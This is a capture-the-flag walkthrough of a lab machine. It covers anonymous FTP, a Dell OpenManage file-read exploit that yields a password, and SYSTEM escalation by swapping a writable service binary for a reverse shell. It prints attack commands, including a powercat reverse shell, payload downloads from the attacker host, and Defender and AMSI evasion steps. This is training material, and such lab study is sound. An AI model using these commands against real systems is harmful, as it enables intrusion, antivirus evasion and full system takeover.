Hack Smarter Security
Can you hack the hackers?
This work by Manav G Krishna is licensed under CC BY-NC 4.0
Machine IP
: 10.10.112.96
Nmap Scan
:
nmap -p- -A -v --min-rate 100 -oN hacksmartersecurity_thm -Pn 10.10.112.96
Nmap scan report for 10.10.112.96
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
|_06-28-23 03:00PM 1022126 stolen-passport.png
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
| 256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_ 256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HackSmarterSec
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open ssl/rxmon?
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Issuer: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-30T19:03:17
| Not valid after: 2025-06-29T19:03:17
| MD5: 4276:b53d:a8ab:fa7c:10c0:1535:ff41:2928
|_SHA-1: c44f:51f8:ed54:802f:bb94:d0ea:705d:50f8:fd96:f49f
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Sat, 16 Mar 2024 06:17:01 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
| <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
| HTTPOptions:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Sat, 16 Mar 2024 06:17:07 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
|_ <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HACKSMARTERSEC
| NetBIOS_Domain_Name: HACKSMARTERSEC
| NetBIOS_Computer_Name: HACKSMARTERSEC
| DNS_Domain_Name: hacksmartersec
| DNS_Computer_Name: hacksmartersec
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-16T06:17:37+00:00
|_ssl-date: 2024-03-16T06:17:41+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=hacksmartersec
| Issuer: commonName=hacksmartersec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-15T06:03:53
| Not valid after: 2024-09-14T06:03:53
| MD5: 8383:3da2:bc78:7d18:98f9:aaf9:d5b0:c626
|_SHA-1: 2012:fcc6:d0ef:d9db:67f0:e3c9:8554:6dfa:26c0:68dd
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1311-TCP:V=7.94SVN%T=SSL%I=7%D=3/16%Time=65F5395C%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,1089,"HTTP/1\.1\x20200\x20\r\nStrict-Transport-Securi
SF:ty:\x20max-age=0\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX-Content-Type-Op
SF:tions:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nvary:\x20
SF:accept-encoding\r\nContent-Type:\x20text/html;charset=UTF-8\r\nDate:\x2
SF:0Sat,\x2016\x20Mar\x202024\x2006:17:01\x20GMT\r\nConnection:\x20close\r
SF:\n\r\n<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20
SF:Strict//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-strict\.dtd\
SF:">\r\n<html>\r\n<head>\r\n<META\x20http-equiv=\"Content-Type\"\x20conte
SF:nt=\"text/html;\x20charset=UTF-8\">\r\n<title>OpenManage™</title>
SF:\r\n<link\x20type=\"text/css\"\x20rel=\"stylesheet\"\x20href=\"/oma/css
SF:/loginmaster\.css\">\r\n<style\x20type=\"text/css\"></style>\r\n<script
SF:\x20type=\"text/javascript\"\x20src=\"/oma/js/prototype\.js\"\x20langua
SF:ge=\"javascript\"></script><script\x20type=\"text/javascript\"\x20src=\
SF:"/oma/js/gnavbar\.js\"\x20language=\"javascript\"></script><script\x20t
SF:ype=\"text/javascript\"\x20src=\"/oma/js/Clarity\.js\"\x20language=\"ja
SF:vascript\"></script><script\x20language=\"javascript\">\r\n\x20")%r(HTT
SF:POptions,1089,"HTTP/1\.1\x20200\x20\r\nStrict-Transport-Security:\x20ma
SF:x-age=0\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX-Content-Type-Options:\x2
SF:0nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nvary:\x20accept-en
SF:coding\r\nContent-Type:\x20text/html;charset=UTF-8\r\nDate:\x20Sat,\x20
SF:16\x20Mar\x202024\x2006:17:07\x20GMT\r\nConnection:\x20close\r\n\r\n<!D
SF:OCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Strict//E
SF:N\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-strict\.dtd\">\r\n<ht
SF:ml>\r\n<head>\r\n<META\x20http-equiv=\"Content-Type\"\x20content=\"text
SF:/html;\x20charset=UTF-8\">\r\n<title>OpenManage™</title>\r\n<link
SF:\x20type=\"text/css\"\x20rel=\"stylesheet\"\x20href=\"/oma/css/loginmas
SF:ter\.css\">\r\n<style\x20type=\"text/css\"></style>\r\n<script\x20type=
SF:\"text/javascript\"\x20src=\"/oma/js/prototype\.js\"\x20language=\"java
SF:script\"></script><script\x20type=\"text/javascript\"\x20src=\"/oma/js/
SF:gnavbar\.js\"\x20language=\"javascript\"></script><script\x20type=\"tex
SF:t/javascript\"\x20src=\"/oma/js/Clarity\.js\"\x20language=\"javascript\
SF:"></script><script\x20language=\"javascript\">\r\n\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 153.05 ms 10.11.0.1
2 153.20 ms 10.10.112.96
From the scan we straight away notice that there is Anonymous FTP Login
and we can also see the listing.
Connecting to the FTP Server
:
Command
:
ftp 10.10.112.96

We can connect with the Name
being anonymous
and the Password
can be left empty or we can use anonymous
.
Downloading the files from the server
:

We notice that the stolen-passport.png
didn't get transferred correctly. This is cause image files are usually stored in binary format. ASCII mode
is the default for the majority of FTP servers and to transfer image files without any corruption we switch to the Binary mode
.
Switching to Binary mode
:

Now the .png
file has downloaded successfully.
Checking out the files
:
The first file - Credit-Cards-We-Pwned.txt
has some credit card information:

There are more lines in that file in a similar fashion.
The second file - stolen-passport.png
:

We can run exiftool
to see if we get some metadata from the image:
Command
:
exiftool stolen-passport.png

No good information in here.
Checking out port 80
:

We can see what Wappalyzer
tells us:

We now know that the web server running is IIS
.
We have a contact form
here:

Testing out a basic XSS Payload
:

Now let's set up a netcat
listener on port 80
. If the above payload works we should be getting a connection back on our listener which basically shows that the server has reached out to our machine. The IP
specified in the payload is the tun0
interface IP
.

But unfortunately we don't get any connection on the listener.
We can now do some directory busting
to see if we get any juicy paths:
Command
:
feroxbuster -u http://10.10.112.96

Nothing interesting here either.
Checking out port 1311
:
SpeedGuide
tells us that this port is used by Dell OpenManage HTTPS
.
Upon googling - port 1311 vulnerability
, we come across this result from tenable
:
Let's keep this aside for now and check out the website:

The certificate
didn't have anything much in it.

We are presented with a Dell OpenManage Server Administrator (OMSA)
login page. Dell EMC OpenManage Enterprise
is a unified systems management console designed to take complexity out of the IT administration experience.
Note
:
Accessing the port over HTTP
gave us this: Bad Request This combination of host and port requires TLS.
This basically shows that we had to access it via HTTPS
which is what we had done.
The stuffs present in the tenable
research blog matches with what we see in the login page. We have the exact dialog boxes as mentioned in the blog. It is a CVE
and it says - An unauthenticated remote attacker can login to OMSA as admin without knowing a correct OS username and password on that system
This indeed sounds juicy, let's give it a try.
Following the POC
:


But this didn't work as expected as it gave us a Login failed
error:

Moving on.
We notice there is an About
section. Let us check it out:

And now we have the version: 9.4.0.2
Note
: The About page does take some time to load, so just wait it out.
Now let us use this version to find exploits:
Upon googling - dellemc 9.4.0.2 exploits
we get this result from Rhino Security Labs
:
It is a file read
vulnerability in Dell OpenManage Server Administrator (OMSA)
.
The blog explains the vulnerability really well and there is also a POC
in there:
Usage
:

Command
:
python3 exploit.py 10.11.75.84 10.10.112.96:1311


We know from before that the web server running is IIS
and also from the Nmap Scan
we can see ports: 22
(SSH) & 3389
(RDP) open. Keeping all this in mind the main file that we could try to read is the web.config
file. It is an XML file containing rules for a particular site (or directory) on a web server.
This file is located within the C:\inetpub\wwwroot
which is the default root directory for websites hosted on IIS
.
In our case the name of the website hosted on the IIS
web server is - hacksmartersec
. We can see this in the Nmap Scan
under the 1311
port information (commonName=hacksmartersec
)
The exact location: C:\inetpub\wwwroot\hacksmartersec\web.config
Let us read this file now:

We can see that we have a password for the username - tyler
We can now SSH
in as this user:
Command
:
ssh tyler@10.10.112.96

We can find the user flag in the Desktop
folder of tyler
.
Checking if we are part of any interesting groups or if we have any juicy privileges
:
Command
:
whoami /all

There is nothing of interest.
Checking if Defender is active
:
Command
:
sc query WinDefend

And yes, we can see that the STATE
is RUNNING
.
We can still try to execute scripts like winPEAS.ps1
, PrivescCheck.ps1
etc. to find vulnerabilities if any:
Also tyler
had Full Control (F)
on the Desktop
folder:
Command
:
icacls .

Full Control (F)
refers to the highest level of permissions that can be granted to a user or group in a Windows security context. When a user or group is assigned Full Control permissions, they have complete control
over the object to which the permissions apply.
So we can put our scripts in the Desktop
folder.
Executing winPEAS.ps1
:
Upon trying to run the script post sending it via wget
(After setting up a python server on port 4545 - python3 -m http.server 4545
), Defender was flagging it as a virus. Also any port can be used to serve the file.
Command
:
wget http://10.11.75.84:4545/winpeas.ps1 -o winpeas.ps1

We can now try to do an AMSI Bypass
. For more information check this out:


The script now starts running without any issues.
Note
:
Running WinPEAS
was taking so much time and it wasn't giving me any good information. I then decided to switch to PrivescCheck
. Also the .exe
of WinPEAS
and a few other scripts that I tested were getting flagged even after running the command that could bypass AMSI
. I have shown only the one's that worked for me in this writeup.
Executing PrivescCheck.ps1
:
When trying to run it, it did without any issues. It wasn't getting flagged by Defender. This is actually one of the few scripts that usually don't get flagged. This time I set up a python server on port 4646
.
Command
:
wget http://10.11.75.84:4646/PrivescCheck.ps1 -o PrivescCheck.ps1

Command
:
. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,CSV,HTML,XML

Now we just wait for it to find something worthy that could help us in rooting the machine.

It has found a vulnerability that is rated High
that let's us Privilege Escalate
as this service is running under the SYSTEM
account and we can start and stop the service:
Name : spoofer-scheduler
ImagePath : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Spoofer
IdentityReference : BUILTIN\Users
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes,
DeleteChild, Traverse
Status : Running
UserCanStart : True
UserCanStop : True
Explanation
:
Name
: Indicates the name of the service or process, which in this case is spoofer-scheduler
.
ImagePath
: Specifies the path to the executable file (spoofer-scheduler.exe
) associated with the service. It's located in the directory C:\Program Files (x86)\Spoofer.
User
: Indicates the user account under which the service is running. In this case, it's running under the LocalSystem
account, which is a built-in Windows account with high privileges.
ModifiablePath
: Specifies the path where the service's files and configurations are stored. In this case, it's located in the directory C:\Program Files (x86)\Spoofer.
IdentityReference
: Specifies the security principal or group that has permissions to access or manage the service. In this case, it's the Users
group (BUILTIN\Users
).
Permissions
: Lists the specific permissions granted to the Users
group for this service. These permissions include WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes, DeleteChild, and Traverse.
Status
: Indicates the current status of the service. In this case, it's Running
, meaning the service is currently running.
UserCanStart
: Specifies whether users have permission to start the service. It's set to True
, indicating that users can start the service.
UserCanStop
: Specifies whether users have permission to stop the service. It's also set to True
, indicating that users can stop the service.
Privilege Escalation to SYSTEM
:
Firstly let us get into the folder where the spoofer-scheduler.exe
is located:


From the PrivEscCheck
output we know that the service - spoofer-scheduler
is currently running
.
Thinking Process
:
Since we know the service is running under the SYSTEM
account and that we have Write
permissions on that folder where the spoofer-scheduler.exe
is located (based on the PrivEscCheck
output), we can remove and replace that binary with our reverse shell binary having the same name. Since the service is currently running, we would have to stop it first to remove the file and once replaced, post starting the service we should be getting a shell as SYSTEM
.
Confirming that we can write into the folder
:
Command
:
icacls .

The user that we have a hold on - tyler
if we recollect is part of the BUILTIN\Users
group and member of this group has Full Control (F)
on the Spoofer
folder where the binary is located and that users belonging to this group can manage the service.
Stopping the spoofer-scheduler service
:
Command
:
Stop-Service -Name "spoofer-scheduler"
Confirming the same
:
Command
:
Get-Service -Name "spoofer-scheduler"

We can see that the Status
is Stopped
.
Now we can remove the original spoofer-scheduler.exe
:
Command
:
rm spoofer-scheduler.exe

Now we can make use of a tool called powercat
for the shell:
Command
:
powercat -c 10.11.75.84 -p 4444 -e cmd -g > test.ps1
This basically creates a reverse shell
.
This PowerShell script has to be converted to an .exe
format. To do this we will be using this online tool:

Now we send the spoofer-scheduler.exe
containing the shell to the machine. The python server being used to serve the file is the one on port 4545
itself:
Command
:
wget http://10.11.75.84:4545/spoofer-scheduler.exe -o spoofer-scheduler.exe

Setting up a netcat
listener on port 4444
:
Command
:
nc -lnvp 4444

Starting the spoofer-scheduler service
:
Command
:
Start-Service -Name "spoofer-scheduler"

Let us go back and check our listener:

We have successfully got a shell as SYSTEM
. The shell will die
pretty soon here.
The last answer we can find in this path:
C:\Users\Administrator\Desktop\Hacking-Targets\hacking-targets.txt

Note
:
Now I will be showing an other script or method that I used to bypass Defender to get a SYSTEM
shell which doesn't die
.
Go Script to Bypass Defender
:
We have to firstly clone the repo:
Command
:
git clone https://github.com/daniellowrie/update_script
Once that is done, we can start to get it working:
Command
:
go run SecUp.go 10.11.75.84
This basically starts the main engine and it generates the payload or the implant along with a few other files that it needs to function as intended and it also sets up a HTTP
server to serve the needed files:

Out of the attack files that it generates, the update_script.go
is the payload file. It also sets the listening port as 443
by default which helps in evading any detections in place most of the times.
So we set up a netcat
listener on port 443
:
Command
:
nc -lnvp 443

Compiling the .go file to an .exe file
:
Command
:
GOOS=windows go build update_script.go
This generates a file named - update_script.exe
:

Now we have to change the file name from update_script.exe
to spoofer-scheduler.exe
as that was the binary in question based on the PrivEscCheck
output:

This file must be now served or sent to the machine. This time I set up a python server on port 4848
and before we send the file we have to start
the spoofer-scheduler
service which is stopped at the moment (Apparently since starting it triggered the shell previously, the service was actually in the STOPPED
state after the shell died). Since spoofer-scheduler.exe
is already present on the machine from what we had done when using powercat
, it must be removed and replaced with the new one.
Command
:
wget http://10.11.75.84:4848/spoofer-scheduler.exe -o spoofer-scheduler.exe
Starting the spoofer-scheduler service
:
Let us now start the service. For starting the service in PowerShell
check the command mentioned in the Privilege Escalation
section.
We can also start it in cmd
like this:
Command
:
sc start spoofer-scheduler
The moment we start it, we can see the files that the Go
script needs to work as needed, being served from the HTTP
server that the script had set up initially:

Checking out our listener:

Yet again we have a SYSTEM
shell. This shell doesn't die like how the powercat
shell did. The Nim
shell that I have mentioned below also did die soon.
An other way to root this machine is by using a reverse shell written in Nim
that goes undetected by Defender, like how powercat
and the Go
script generated payload went through without getting removed. Tyler himself has made a video on this, do check that out:
Room solved!!
Last updated